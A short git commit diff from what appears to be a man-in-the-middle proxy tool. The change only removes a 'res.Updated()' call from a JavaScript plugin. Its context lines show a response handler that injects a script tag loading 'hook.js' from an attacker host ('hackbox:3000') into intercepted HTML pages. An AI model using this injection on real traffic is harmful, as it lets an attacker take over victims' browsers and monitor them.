fix: no more explicit call to that ugly Updated method from proxy js plugins

This commit is contained in:
evilsocket 2018-02-08 12:32:22 +01:00
parent 3c2932514a
commit adc2dde170
7 changed files with 26 additions and 16 deletions

View file

@ -11,7 +11,6 @@ function onResponse(req, res) {
'</head>',
'<script type="text/javascript" src="http://hackbox:3000/hook.js"></script></head>'
);
res.Updated();
}
}
}